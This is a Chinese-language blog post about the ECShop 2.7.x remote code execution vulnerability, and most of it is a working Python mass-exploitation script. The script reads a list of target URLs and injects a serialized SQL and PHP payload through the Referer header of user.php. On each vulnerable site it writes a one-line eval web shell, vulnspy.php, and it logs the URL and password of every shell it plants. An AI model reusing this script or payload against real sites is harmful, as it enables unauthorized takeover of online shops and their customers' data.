Eschop

Writing
创建时间:
阅读:
  1. 前言
    1. 正文

前言

emmm,这个洞都是星期一的事情了。只不过我在上学,无奈的一批没办法写博客和进行复现。现在才补上,sorry啊。

iPZGkR.jpg

正文

漏洞分析原文:ECShop全系列版本远程代码执行高危漏洞分析
ECSHOP RCE 漏洞复现教程:VULNSPY实验-ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞利用
漏洞复现地址:https://www.vsplate.com/?github=vulnspy/ECShop_2.7.3_UTF8_installed&autogo=1

复现完漏洞之后,你就明白得到了其中的思路:

此脚本的思路:
首先先判断是否存在远程漏洞,如果有加入列表与写入save.txt 判断加入的列表是否有存在漏洞的url,大于0则用正则匹配出url,一个url进行getshell请求。然后那个匹配出来的url加入getshell之后的一句话后门路径。判断是否存在存在就写入txt否则就不写入....可能说的比较不清楚

代码:
import requests
import threading
import os
import re
import time

xj=open(‘save.txt’,’w’)
xj.close()

cz=[]
def exploit(url):
url=url+’/user.php’
header={‘Referer’: ‘554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:”id”;s:3:”‘“‘“‘/“;s:3:”num”;s:201:”/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0–”;s:4:”name”;s:3:”ads”;}554fcae493e564ee0dc75bdf2ebf94ca’}
data={‘action’:’login’,’vulnspy’:’phpinfo();exit;’}
try:
reqt=requests.post(url=url,headers=header,data=data,timeout=10)
if ‘PHP Version’ in reqt.text:
print(‘[+] Remote code execution high-risk vulnerabilities url:{}’.format(reqt.url))
print(‘[+] Remote code execution high-risk vulnerabilities url:{}’.format(reqt.url),file=open(‘save.txt’,’a’))
cz.append(reqt.url)
else:
print(‘[-] Not debug url:{}’.format(reqt.url))
except Exception as g:
print(‘[-] Error {}’.format(g))

if len(cz)>0:
    print('[+] start getshell')
else:
    print('[-] not debug,Unable to getshell')
    exit()


getshellpayloads={'action':'login','vulnspy':'eval(base64_decode($_POST[d]));exit;','d':'ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbCgkX1JFUVVFU1RbdnVsbnNweV0pOz8+Jyk7'}

for t in cz:
    tx=re.sub('/user.php','',str(t))
    try:
        reqts2=requests.post(url=t,headers=header,data=getshellpayloads)
        reqts3=requests.post(url=tx+'/vulnspy.php?vulnspy=phpinfo();')
        if 'PHP Version' in reqts3.text:
            print('[+] Getshell success url:{} password:{}'.format(reqts3.url, 'vulnspy'))
            print('[+] Getshell success url:{} password:{}'.format(reqts3.url,'vulnspy'),file=open('save.txt','a'))
        else:
            print('[-] Getshell failure url:{}'.format(reqts3.url))
    except Exception as p:
        print('[-] Error {}'.format(p))

if name == ‘main‘:
user = input(‘file:’)
if os.path.exists(user):
print(‘[+] file {} ok’.format(user))
else:
print(‘[-] not file {}’.format(user))
exit()

dk=open('{}'.format(user),'r')
for d in dk.readlines():
    qc="".join(d.split('\n'))
    t=threading.Thread(target=exploit,args=(qc.rstrip('/'),))
    t.start()


测试结果:
iPe941.png

iPepNR.png

iPeMCt.md.png

转载请声明:转自422926799.github.io

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:Eschop

本文作者:九世

发布时间:2018-09-07, 20:16:00

最后更新:2019-04-19, 20:36:16

原始链接:http://jiushill.github.io/posts/8d126442.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

©2016-2019 Yelog

Built with Hexo and 3-hexo theme

目录